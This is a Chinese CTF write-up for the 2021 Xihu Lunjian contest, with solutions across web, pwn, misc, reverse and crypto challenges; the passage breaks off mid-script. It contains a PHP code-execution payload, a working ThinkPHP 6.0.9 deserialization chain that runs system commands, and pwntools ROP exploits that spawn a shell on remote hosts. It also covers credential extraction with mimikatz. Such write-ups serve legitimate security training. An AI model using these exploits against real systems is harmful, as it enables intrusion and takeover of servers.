2021_西湖论剑WP_by玛卡巴卡开叮叮车来打CTF

Web

Ez?upload

payload:

{(exec)//**/**/($_GET[1])}

上传文件 模板覆盖就可

img

img

灏妹的web

dirsearch 扫描 /.idea/dataSources.xml

访问即可

img

EasyTp

通过触发报错得知TP版本是6.0.9,然后提示有file参数,测试后通过伪协议读源码

http://235e3f8b-77d7-4239-963f-920b229ab552.easytp-ctf.dasctf.com:2333/public/?file=php://filter/read=convert.base64-encode/resource=index.php

读取内容:

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

解码后:



// +----------------------------------------------------------------------
// Recovered public/index.php of the ThinkPHP 6 application (the base64
// returned by the php://filter read above, decoded). It matches the stock
// framework front controller; nothing in it is challenge specific.
// [ Application entry file ]

namespace think;

require __DIR__ . '/../vendor/autoload.php';

// Run the HTTP application and send the response
$http = (new App())->http;

$response = $http->run();

$response->send();

$http->end($response);

通过这种方式能去读到文件,读了一通后读Index.php,解码后内容如下:

<?php



namespace app\controller;



use app\BaseController;



class Index extends BaseController

{
    /**
     * GET /index/index?file=...
     *
     * Source viewer driven by the untrusted $_GET['file'] value. The only
     * controls are a case-insensitive "flag" substring block and a
     * file_exists() check that refuses anything resolving to a real path;
     * a value file_exists() does not recognise (the writeup uses a
     * php://filter stream wrapper) still reaches highlight_file(), which is
     * how index.php and Index.php were read. Mitigation: resolve the name
     * against an allow-list of viewable files, or drop the parameter.
     */
    public function index()
    {
        //return "htmlxxx13 years and still true to its roots - the PHP framework you can trust";
        if (isset($_GET['file'])) {
            $file = $_GET['file'];
            $file = trim($file);
            $file = preg_replace('/\s+/','',$file);      // strip all whitespace
            if(preg_match("/flag/i",$file)){ die('no flag..');}   // substring block only
            if(file_exists($file)){
                echo "file_exists() return true..";
                die( "hacker!!!");
            }else {
                // Reached for names file_exists() rejects, e.g. stream wrappers.
                @highlight_file($file);
            }

        } else {

            echo "Error! no file parameter ";
            echo "highlight_file Error";
        }

    }

    /**
     * GET /index/unser?vulvul=...
     *
     * Deserialises $_GET['vulvul'] after a filter that rejects any query
     * value containing the letter "O" (the serialized-object marker). The
     * filter runs over the query string parse_url() extracts from
     * REQUEST_URI, not over $ser itself; per the reference linked in the
     * writeup a request whose URI parse_url() cannot parse yields no query
     * values, so the loop checks nothing and unserialize() runs anyway.
     * Mitigation: never unserialize() caller-controlled data; accept JSON
     * instead, or at minimum unserialize($ser, ['allowed_classes' => false]).
     */
    public function unser(){
        if(isset($_GET['vulvul'])){
            $ser = $_GET['vulvul'];
            $vul = parse_url($_SERVER['REQUEST_URI']);
            parse_str($vul['query'],$query);

            foreach($query as $value)
            {
                if(preg_match("/O/i",$value))
                {
                    die('Hacking?');
                    exit();
                }
            }
            unserialize($ser);   // untrusted input, no class restriction
        }

    }

}

参考https://www.shawroot.cc/1044.html,用///public/?payload=这种url来绕过O的检测

https://xz.aliyun.com/t/9310#toc-6 链子能用

<?php

namespace think\model\concern{
    // Minimal stand-in for ThinkPHP's Attribute trait: only the private
    // property the serialised object needs is declared, no behaviour.
    trait Attribute{
        private $data = [7];
    }
}



namespace think\view\driver{
    // Empty stand-in; serialize() only needs the fully qualified class name.
    class Php{}
}



namespace think{
    // Property-only copy of think\Model so that serialize() emits the same
    // private/protected property names as the framework class (the
    // "\0think\Model\0" and "\0*\0" prefixes visible in the payload URL
    // further down). The framework's methods are omitted on purpose: they
    // are not needed to produce the serialised string.
    abstract class Model{
        use model\concern\Attribute;
        private $lazySave;
        protected $withEvent;
        protected $table;
        // $cmd is passed through unchanged and ends up in route\Url::$domain.
        function __construct($cmd){
            $this->lazySave = true;
            $this->withEvent = false;
            $this->table = new route\Url(new Middleware,new Validate,$cmd);
        }
    }
    // Stand-in carrying the single public property the serialised graph needs.
    class Middleware{
        public $request = 2333;
    }
    // Stand-in for think\Validate; $type maps a method name to a
    // callable-shaped [object, method] pair.
    class Validate{
        protected $type;
        function __construct(){
             $this->type = [
                "getDomainBind" => [new view\driver\Php,'display']
            ];
        }
    }
}



namespace think\model{
    use think\Model;
    // Concrete subclass: Model is abstract, so this is the class actually
    // instantiated and serialised (O:17:"think\model\Pivot" in the payload).
    class Pivot extends Model{} 
}



namespace think\route{
    // Property-only copy of think\route\Url; the constructor just stores the
    // app/route stand-ins and the caller's string in $domain.
    class Url
    {
        protected $url = 'a:';
        protected $domain;
        protected $app;
        protected $route;
        function __construct($app,$route,$cmd){
            $this->domain = $cmd;
            $this->app = $app;
            $this->route = $route;
        }
    }
}



namespace{
    // Prints the base64 of the serialised object graph. The request URL
    // below carries the same serialised string URL-encoded (no base64).
    echo base64_encode(serialize(new think\Model\Pivot('<?php system("cat /flag"); exit(); ?>')));
}

img

http://235e3f8b-77d7-4239-963f-920b229ab552.easytp-ctf.dasctf.com:2333///public/index.php/index/unser?vulvul=O:17:%22think\model\Pivot%22:4:{s:21:%22%00think\Model%00lazySave%22;b:1;s:12:%22%00*%00withEvent%22;b:0;s:8:%22%00*%00table%22;O:15:%22think\route\Url%22:4:{s:6:%22%00*%00url%22;s:2:%22a:%22;s:9:%22%00*%00domain%22;s:37:%22%3C?php%20system(%22cat%20/flag%22);%20exit();%20?%3E%22;s:6:%22%00*%00app%22;O:16:%22think\Middleware%22:1:{s:7:%22request%22;i:2333;}s:8:%22%00*%00route%22;O:14:%22think\Validate%22:1:{s:7:%22%00*%00type%22;a:1:{s:13:%22getDomainBind%22;a:2:{i:0;O:21:%22think\view\driver\Php%22:0:{}i:1;s:7:%22display%22;}}}}s:17:%22%00think\Model%00data%22;a:1:{i:0;i:7;}}

img

Pwn

blind

通过alarm爆破syscall

import sys

from pwn import *

# Exploit driver for the "blind" pwn challenge (pwntools). Written for the
# Python 2 flavour of pwntools: later lines concatenate str with the bytes
# returned by p64(), which raises TypeError on Python 3.
# context.arch = "amd64"

context.log_level = 'debug'   # echo every byte sent/received

# Short aliases around the tube `p` created below: send, send-line,
# send-after / send-line-after, and ss*/ssl variants that str() the payload.
shell = lambda : p.interactive()

s = lambda buf: p.send(buf)

ss = lambda buf: p.send(str(buf))

sl = lambda buf: p.sendline(buf)

ssl = lambda buf: sl(str(buf))

sa = lambda delim, buf: p.sendafter(delim, buf)

ssa = lambda delim, buf: sa(delim, str(buf))

sla = lambda delim, buf: p.sendlineafter(delim, buf)


# Receive helpers: fixed byte count, everything until EOF/timeout, until a
# delimiter (optionally dropping it), one line.
r = lambda n: p.recv(n)

ra = lambda t=tube.forever:p.recvall(t)

ru = lambda delim, drop=False: p.recvuntil(delim, drop)

rl = lambda: p.recvline()


# Widen a short little-endian leak to 4/8 bytes before unpacking.
uu32 = lambda data : u32(data.ljust(4, '\x00'))

uu64 = lambda data : u64(data.ljust(8, '\x00'))

# Read up to the first 0x7f byte and unpack the last six bytes as a 64-bit
# value — the usual way to pull a leaked user-space address out of output.
ru64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))

e4 = lambda logg : log.success(logg)

g = lambda : gdb.attach(p)

# argv[1] == 'p' runs the local binary; any other value talks to the remote
# instance. Running with no argument at all raises IndexError here.
if sys.argv[1] == 'p':

    p = process('./blind')

else:

    p = remote('82.157.6.165',59800)

elf=  ELF('./blind')   # parsed for the GOT addresses used below; the fixed 0x4007xx addresses imply a non-PIE binary

# libc=ELF('/lib/i386-linux-gnu/libc.so.6')

def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):
    """Build one ROP frame for a two-part "pop six registers, then call"
    gadget pair. The callers pass 0x4007BA/0x4007A0, which look like the
    usual __libc_csu_init tail — the register annotations below assume
    that layout; confirm against the binary's disassembly.

    part1: gadget that pops six callee-saved registers and returns.
    part2: gadget that performs the indirect call using those registers.
    jmp2:  address holding the function pointer to call (a GOT slot in
           every caller below).
    arg1..arg3: values that become the call's first three arguments.

    Returns the frame as a str (Python 2 only: str is concatenated with
    the bytes from p64()). The trailing 56 filler bytes are consumed by the
    pops executed after part2's call, before the next frame is returned into.
    """
    payload = p64(part1)    
    payload += p64(0x0)     # rbx (assumed) — loop counter for the call
    payload += p64(0x1)     # rbp (assumed) — makes the gadget's loop exit after one call
    payload += p64(jmp2)    # r12 (assumed) — pointer to the callee
    payload += p64(arg3)    # r13 (assumed)
    payload += p64(arg2)    # r14 (assumed)
    payload += p64(arg1)    # r15 (assumed)
    payload += p64(part2)   
    payload += 'A' * 56     # padding for the seven qwords popped after the call
    return payload



# Gadget addresses from the non-PIE binary; pop_rdi/pop_rsi_r15 are kept for
# reference only, the frames below all go through com_gadget().
pop_rdi =  0x00000000004007c3

pop_rsi_r15 = 0x00000000004007c1

payload = "a" * 0x58   # distance to the saved return address (from the binary, not shown here)

# Frame 1: read(0, alarm@GOT, 1) — the single byte sent below overwrites the
# low byte of alarm's GOT entry.
payload += com_gadget(0x4007BA,0x4007A0,elf.got["read"],0,elf.got["alarm"],1)

# Frame 2: read(0, 0x601088, 0x3b) — the 0x3b-byte string sent below is
# stored at a fixed writable address.
payload += com_gadget(0x4007BA,0x4007A0,elf.got["read"],0,0x601088,0x3b)

# Frame 3: call through the patched alarm slot with 0x601088 as the first
# argument. The section heading says the patch byte was found by brute
# force ("通过alarm爆破syscall"); this run uses 0xd5.
payload += com_gadget(0x4007BA,0x4007A0,elf.got["alarm"],0x601088,0,0)

payload += (0x500 - len(payload)) * "\x00"   # pad to 0x500 bytes (presumably the size of the vulnerable read)

#g()

s(payload)

s("\xd5")   # the one byte consumed by frame 1

s("/bin/sh\x00" + "a" * (0x3b-8))   # exactly 0x3b bytes for frame 2



shell()

img

string_go

# -*- encoding: utf-8 -*-

import sys

from pwn import *

# Exploit driver for "string_go" (pwntools, Python 2 flavour: str and the
# bytes from p64() are concatenated below).
# context.arch = "amd64"

context.log_level = 'debug'   # echo every byte sent/received

# Short aliases around the tube `p` created below: send, send-line,
# send-after / send-line-after, and ss*/ssl variants that str() the payload.
shell = lambda : p.interactive()

s = lambda buf: p.send(buf)

ss = lambda buf: p.send(str(buf))

sl = lambda buf: p.sendline(buf)

ssl = lambda buf: sl(str(buf))

sa = lambda delim, buf: p.sendafter(delim, buf)

ssa = lambda delim, buf: sa(delim, str(buf))

sla = lambda delim, buf: p.sendlineafter(delim, buf)


# Receive helpers: fixed byte count, everything until EOF/timeout, until a
# delimiter (optionally dropping it), one line.
r = lambda n: p.recv(n)

ra = lambda t=tube.forever:p.recvall(t)

ru = lambda delim, drop=False: p.recvuntil(delim, drop)

rl = lambda: p.recvline()


# Widen a short little-endian leak to 4/8 bytes before unpacking.
uu32 = lambda data : u32(data.ljust(4, '\x00'))

uu64 = lambda data : u64(data.ljust(8, '\x00'))

# Read up to the first 0x7f byte and unpack the last six bytes as a 64-bit
# value — the usual way to pull a leaked user-space address out of output.
ru64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))

e4 = lambda logg : log.success(logg)

g = lambda : gdb.attach(p)

# Convenience accessors for PLT/GOT/symbol addresses; none are used below.
read_plt =  lambda : elf.plt["read"]

write_plt = lambda : elf.plt["write"]

read_got =  lambda : elf.got["read"]

write_got = lambda : elf.got["write"]

puts_plt =  lambda : elf.plt["puts"]

puts_got =  lambda : elf.got["puts"]

main = lambda: elf.symbols["main"]



# argv[1] == 'p' runs the local binary; any other value talks to the remote
# instance. Running with no argument at all raises IndexError here.
if sys.argv[1] == 'p':

    p = process('./string_go')

else:

    p = remote('82.157.20.104',25300)

elf=  ELF('./string_go')

libc=ELF('./libc-2.27.so')   # libc shipped with the challenge; offsets below are for this build



# Menu interaction that produces the leak. The exact inputs ("1+2", "-7",
# "qqqqqqqq", "\x10") come from reversing the challenge and are not
# explained on this page.
sla("> ","1+2")

sla("> ","-7")

sla("> ","qqqqqqqq")

sla("> ","\x10")

# Parse the leaked memory dump: skip 0x38 bytes, take the canary, skip
# 0x18, take a binary address, skip 0x98, take a libc address.
r(0x38)

canary = u64(r(0x8))

r(0x18)

elf.address = u64(r(0x8)) - 0x254D     # PIE base = leaked pointer minus its offset inside the binary

r(0x98)

libc.address = u64(r(0x8)) - 0x21BF7   # libc base; 0x21bf7 is the usual __libc_start_main+231 for 2.27 — verify

#g()

#0x0000000000003cf3 : pop rdi ; ret

rdi = 0x0000000000003cf3

# system("/bin/sh"): pop rdi ; ret -> "/bin/sh" address -> system
chain = p64(elf.address +rdi) + p64(next(libc.search("/bin/sh"))) + p64(libc.sym["system"])

# 0x18 bytes up to the canary, the canary itself, 0x18 bytes up to the
# return address, then binary+0x14ce (purpose not visible here; presumably
# a ret used for stack alignment) followed by the chain.
payload = "a" * 0x18 + p64(canary) + "a" * 0x18 + p64(elf.address+0x00000000000014ce) + chain

#g()



sla(">>> ",payload)

#g()



shell()

img

Misc

真·签到

就公众号签到。

YUSA的小秘密

steg在red plane 0和green都能发现有数据,能看到flag字样但是不全

img

本题用到的通道是YCrCb。通过python的cv2库对img图片数据进行色彩空间转换,即可得到三个通道的数据,然后再对三个通道中的数据根据奇偶做二值化处理,也即判断数据的最低位:

参考ByteCT这个题:https://tyskill.github.io/posts/byte2020%E6%B0%B4%E5%8D%B0/

from cv2 import cv2 as cv

# Convert the image to YCrCb, then write the least-significant bit of each
# plane as a black/white image so the hidden bitmap becomes visible.
img = cv.imread('211119619784cbdb9fb.png')
src = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)
Y, Cr, Cb = cv.split(src)

for name, plane in (('Y', Y), ('Cr', Cr), ('Cb', Cb)):
    lsb = plane % 2            # 0 or 1 per pixel
    cv.imwrite(name + '.png', lsb * 255)

img

Yusa的秘密

首先分析进程和cmdscan和cmdlist

img

img

除彩蛋外可以发现使用了Win7的便笺,还创建了联系人

然后扫描文件,并按提示尝试过滤yusa,sakura字样

py -2 vol.py -f Yusa-PC.raw --profile=Win7SP1x64 filescan > files.txt

得到Mystery Man.contact、sakura-didi.zip、StickyNotes.snt、Yusa.contact、key.zip等可疑文件,还有好几个彩蛋,dump之后分别来查看,首先是Yusa.contact

img

然后在win7里导入StickyNotes.snt,如下所示

img

密码“世界没了心跳”是key.zip的解压密码,得到一个名为exp的python脚本

from PIL import Image

import struct

# The `exp` script as found inside key.zip: XORs `flag` with a key stream
# derived from key.bmp and writes the result to Who_am_I. Kept verbatim;
# the decryptor further down is its mirror image.
pic = Image.open('key.bmp')

fp = open('flag', 'rb')        # neither handle is closed if an exception is raised below

fs = open('Who_am_I', 'wb')



a, b = pic.size

# Key stream: six channel values per pixel in row-major order (assumes
# three-component RGB pixels).
list1 = []

for y in range(b):

    for x in range(a):

        pixel = pic.getpixel((x, y))

        list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1], pixel[0]])



data = fp.read()

# NOTE: `i % a*b*6` parses as ((i % a) * b) * 6, NOT i % (a*b*6). Only
# a*6 distinct key positions are ever used, and the decryptor must
# reproduce this exact expression to undo the XOR.
for i in range(0, len(data)):

    fs.write(struct.pack('B', data[i] ^ list1[i % a*b*6]))

fp.close()

fs.close()

还需要得到其他的信息,然后来看Mystery Man.contact

img

有一串Base32字符串,解开之后里面还有一段Base64,如下所示

img

这是你会用到的key,可以用它打开组织给你的工具。工具命名依照了传统规则。key:820ac92b9f58142bbbc27ca295f1cf48

这个是sakura-didi.zip的密码,解压得到key.bmp

img

现在还差Who_am_I.zip的解压密码,使用vol的mimikatz插件得到用户密码

img

YusaYusa520也是该压缩包的解压密码

有了上述文件,改动一下加密脚本exp就可以解密得到flag文件

from PIL import Image

import struct

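# Inverse of the recovered `exp` script: the transform is a plain XOR with a
# key stream derived from key.bmp, so running it on Who_am_I with the file
# roles swapped recovers `flag`.
pic = Image.open('key.bmp')

a, b = pic.size

# Key stream: six channel values per pixel, row-major pixel order. Assumes
# three-component (RGB) pixels, exactly as the original script did.
list1 = []

for y in range(b):

    for x in range(a):

        pixel = pic.getpixel((x, y))

        list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1], pixel[0]])

# NOTE: the index `i % a*b*6` parses as ((i % a) * b) * 6 — NOT
# i % (a*b*6). It is reproduced verbatim because the encryptor used the
# same expression; "fixing" the precedence would break decryption. The
# largest index, (a-1)*b*6, is always inside list1 (length a*b*6).
with open('Who_am_I', 'rb') as fs:

    data = fs.read()

# Files are closed on every exit path; the whole output is written once
# instead of one struct.pack() call per byte (same bytes, same order).
with open('flag', 'wb') as fp:

    fp.write(bytes(byte ^ list1[i % a*b*6] for i, byte in enumerate(data)))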

得到的是一个gif,在第十帧有flag字样

img

Reverse

gghdl

程序很复杂,patch程序尝试单字节爆破

import string 

import os 

from pwn import * 

# Byte-at-a-time brute force of the flag against a patched copy of the
# challenge binary. The patch offsets below are taken as-is from the
# writeup; what they change inside the program is not visible here.
context.log_level = 'critical'   # keep pwntools quiet while spawning many processes

data = list(open('./21111961978038e80fb','rb').read())   # original binary as a mutable byte list

flag = 'DASCTF{' 

for i in range(100):   # upper bound on the flag length; the loop keeps going even if no byte matches

    data[190277+2] = len(flag)+2     # presumably the number of bytes the check compares — confirm in the disassembly

    data[0x2e74e] = 0xa2             # patch at 0x2e74e plus eight zero bytes after it

    for j in range(8):         

        data[0x2e74e+1+j] = 0     

    open('buf','wb').write(bytes(data))   # handle is closed by refcount (CPython); prefer `with`

    os.system('chmod +x ./buf')           # fixed path, no user input; os.chmod() would avoid the shell entirely

    for ch in string.printable[::-1]:     # candidates from the end of string.printable (whitespace first)

        tflag = (flag+ch+'}'*1000+'}')[:44]   # pad with '}' to 44 characters (assumed flag length)

        p = process('./buf')         

        p.sendline(tflag)              # str on Python 3 pwntools is encoded (with a warning on newer versions)

        ret =  p.recvall()             # waits for the process to exit

        if b'Wrong' not in ret:        # anything other than the failure marker counts as a hit

            print(tflag)             

            flag+=ch             

            break   # note: tubes are never close()d — acceptable for a one-off script

ROR

关键逻辑如下

外面循环5层,里面循环8层,里面循环每次添加8个字符,每个字符是通过位运算相加得到的,得到加密位置对应的数组后经过计算得到flag

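# Bit masks the binary uses when it isolates single bits; kept for
# reference only — the decoder below works on '{:08b}' strings instead.
v6 = [128, 64, 32, 16, 8, 4, 2, 1]

# 256-entry substitution table lifted from the binary (byte_405000).
byte_405000 = [0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B, 0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7, 0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF, 0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2, 0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C, 0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE, 0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC, 0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98, 0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED, 0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8, 0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04, 0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8, 0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4, 0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9, 0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72, 0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62, 0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA, 0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A, 0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3, 0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84, 0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F, 0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1, 0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF, 0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB, 0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1, 0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F]

# Encrypted flag as stored in the binary (40 bytes = five groups of eight).
cipher = [0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB, 0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39, 0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39, 0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79]


def decode(cipher, table):
    """Invert the check: map each cipher byte through the inverse of *table*,
    then transpose every group of eight 8-bit values so that bit i (MSB
    first) of the eight values becomes output byte i.

    Args:
        cipher: sequence of ints produced by the binary.
        table: substitution table; ``table[x]`` is the byte emitted for
            index ``x``. Duplicates resolve to the first occurrence, the
            same way ``list.index`` does.

    Returns:
        The decoded text, one character per cipher byte ('' for no input).

    Raises:
        ValueError: if a cipher byte does not occur in *table*, or if
            ``len(cipher)`` is not a multiple of eight (a partial group
            cannot be transposed).
    """
    if len(cipher) % 8:
        raise ValueError("cipher length must be a multiple of 8")
    # Inverse lookup built once; avoids an O(len(table)) .index() per byte.
    inverse = {}
    for idx, val in enumerate(table):
        inverse.setdefault(val, idx)
    try:
        rows = ['{:08b}'.format(inverse[c]) for c in cipher]
    except KeyError as err:
        raise ValueError('cipher byte {!r} not in table'.format(err.args[0])) from None
    out = []
    for k in range(0, len(rows), 8):
        group = rows[k:k + 8]
        # Column i of the 8x8 bit matrix is output byte i.
        for i in range(8):
            out.append(chr(int(''.join(row[i] for row in group), 2)))
    return ''.join(out)


# Same output as the original character-by-character print (no trailing newline).
print(decode(cipher, byte_405000), end="")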

TacticalArmed

33轮tea sum每次加密完不重置

// xhlj1.cpp : 定义控制台应用程序的入口点。

//



#include "stdafx.h"

#include 



/*
 * Undo 33 rounds of the TEA-style block cipher found in the binary.
 *   v   - two 32-bit words, decrypted in place
 *   k   - four 32-bit key words
 *   sum - the round constant the *last* encryption round of this block used
 * Each iteration peels off one encryption round, then moves sum forward by
 * 0x7E5A96D2 (the encryptor is not shown; main() derives its schedule by
 * subtracting that constant 33 times per block, so decryption adds it back).
 */
void decrypt(uint32_t* v, uint32_t* k, uint32_t sum) {
    uint32_t left = v[0];
    uint32_t right = v[1];
    const uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    int rounds_left = 33;

    while (rounds_left-- > 0) {
        right -= ((left << 4) + k2) ^ (left + sum) ^ ((left >> 5) + k3);
        left  -= ((right << 4) + k0) ^ (right + sum) ^ ((right >> 5) + k1);
        sum += 0x7E5A96D2;
    }

    v[0] = left;
    v[1] = right;
}



/*
 * Decrypt the five 8-byte blocks of the flag and print them as hex words.
 * The cipher never reset its running sum between blocks, so block j starts
 * where block j-1 finished: 33 subtractions of 0x7E5A96D2 per block, mod 2^32.
 */
int main()
{
    uint32_t sum[5];
    uint32_t running = 0;
    for (int j = 0; j < 5; j++) {
        /* 33 * delta reduced mod 2^32 == 33 single subtractions of delta. */
        running -= (uint32_t)(33ull * 0x7E5A96D2ull);
        sum[j] = running;
    }

    uint32_t k[4] = { 0x7CE45630,0x58334908,0x66398867,0x0C35195B1 };
    uint32_t v[10] = { 0x422F1DED,0x1485E472,0x35578D5,0x0BF6B80A2,0x97D77245,
        0x2DAE75D1,0x665FA963,0x292E6D74,0x9795FCC1,0x0BB5C8E9 };

    for (int i = 0; i < 5; i++) {
        uint32_t *block = &v[2 * i];
        decrypt(block, k, sum[i]);
        printf("0x%x,0x%x,", block[0], block[1]);
    }

    return 0;
}
import libnum

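# Decrypted TEA words printed by the C program above; each word holds four
# flag characters in little-endian order.
flagtable = [0x3144676b,0x3242676f,0x32614779,0x41696f72,0x47695865,0x71615f38,0x437a4c6e,0x46725f4a,0x72505348,0x4b35356e]


def word_to_le_bytes(n):
    """Minimal big-endian encoding of *n* reversed — the stdlib equivalent
    of libnum.n2s(n)[::-1]. 0 encodes as a single zero byte, as libnum
    does; n must be non-negative.
    """
    length = max(1, (n.bit_length() + 7) // 8)
    return n.to_bytes(length, 'big')[::-1]


# join() instead of repeated bytes concatenation; same bytes, same order.
flagstr = b''.join(word_to_le_bytes(word) for word in flagtable)

print(flagstr)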

虚假的粉丝

通过搜索文件内容中有U开头S结尾的内容,找到ASCII-faded 4157.txt,里面有UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS,base64解出来是S3Cre7_K3y%20%3D%20Al4N_wAlK3R,将Al4N_wAlK3R作为key对ASCII-faded 5315.txt进行异或,得到的字符画图案为flag

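import base64


def xor_decode(data, key):
    """XOR every byte of *data* with the repeating ASCII *key* and return
    the result as text (one chr() per byte, i.e. Latin-1 style, exactly as
    the original loop produced it).

    Args:
        data: raw bytes of the obfuscated file.
        key: non-empty str whose code points are applied cyclically.

    Returns:
        str with len(data) characters; empty input gives ''.

    Raises:
        ValueError: if *key* is empty.
    """
    if not key:
        raise ValueError("key must not be empty")
    key_bytes = [ord(ch) for ch in key]
    period = len(key_bytes)   # was a hard-coded 11 (= len('Al4N_wAlK3R'))
    return ''.join(chr(byte ^ key_bytes[i % period]) for i, byte in enumerate(data))


if __name__ == "__main__":
    with open('./f/ASCII-faded 5315.txt', 'rb') as f:
        data = f.read()

    # The base64 string from ASCII-faded 4157.txt decodes to the URL-encoded
    # hint 'S3Cre7_K3y%20%3D%20Al4N_wAlK3R'; the key is its right-hand side.
    key = base64.b64decode(b'UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS')
    #print(key) #'S3Cre7_K3y%20%3D%20Al4N_wAlK3R'

    key = 'Al4N_wAlK3R'

    dec_data = xor_decode(data, key)

    print(dec_data)
    # Written with the platform default encoding, as before; bytes >= 0x80
    # in the result are therefore not guaranteed to round-trip.
    with open('output.txt', 'w') as f:
        f.write(dec_data)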

flag: A_TrUe_AW_f4ns

Crypto

unknown_dsa

这个题目的第一步是佩尔方程 / Pell方程求最小解

def solve_pell(N, numTry = 100):
    """Smallest solution (x, y) of Pell's equation x^2 - N*y^2 = 1.

    SageMath code: `^` is exponentiation and continued_fraction()/sqrt()
    are Sage built-ins (under plain Python `^` would be XOR). Walks the
    convergents p_i/q_i of sqrt(N) — the fundamental solution is always one
    of them — and returns the first (numerator, denominator) pair that
    satisfies the equation, or (None, None) if none of the first numTry
    convergents does (N a perfect square, or numTry too small).
    """
    cf = continued_fraction(sqrt(N))
    for i in range(numTry):
        denom = cf.denominator(i)
        numer = cf.numerator(i)
        if numer^2 - N * denom^2 == 1:
            return numer, denom
    return None, None



N =   # the challenge's N was lost when this page was captured; paste it here before running
solve_pell(N)   # in a script wrap this in print(); only the Sage REPL echoes the value


然后利用脚本和题目给的求出m1,m2

import gmpy2

from functools import reduce

import hashlib

from Crypto.Util.number import *

from Crypto.Hash import SHA

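def _bezout(a, b):
    """Return (s, t) with s*a + t*b == gcd(a, b) (iterative extended Euclid)."""
    old_s, s = 1, 0
    old_t, t = 0, 1
    while b:
        q = a // b
        a, b = b, a - q * b
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    return old_s, old_t


def uni(P, Q):
    """Combine the congruences x = r1 (mod m1) and x = r2 (mod m2).

    Generalised CRT: the moduli need not be coprime; the combined modulus
    is lcm(m1, m2). Pure stdlib (the original relied on gmpy2).

    Args:
        P: (r1, m1) pair.
        Q: (r2, m2) pair.

    Returns:
        (r, lcm(m1, m2)) with r the unique solution modulo the lcm.

    Raises:
        ValueError: if the congruences are inconsistent, i.e. r2 - r1 is
            not divisible by gcd(m1, m2).
    """
    import math

    r1, m1 = P
    r2, m2 = Q
    d = math.gcd(m1, m2)
    if (r2 - r1) % d:
        raise ValueError("incompatible congruences: %s mod %s and %s mod %s" % (r1, m1, r2, m2))
    # l1 * (m1/d) + l2 * (m2/d) == 1; only l1 is needed.
    l1, _ = _bezout(m1 // d, m2 // d)
    modulus = m1 // d * m2          # lcm(m1, m2), computed once
    return (r1 + (r2 - r1) // d * l1 * m1) % modulus, modulus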



def CRT(eq):
    """Fold an iterable of (residue, modulus) pairs into one congruence.

    Pairs are combined left to right with uni(); the result is
    (residue, lcm of all moduli). An empty iterable raises TypeError, the
    same as functools.reduce() without an initial value.
    """
    acc = None
    seen_any = False
    for pair in eq:
        acc = pair if not seen_any else uni(acc, pair)
        seen_any = True
    if not seen_any:
        raise TypeError("reduce() of empty iterable with no initial value")
    return acc

if __name__ == "__main__":

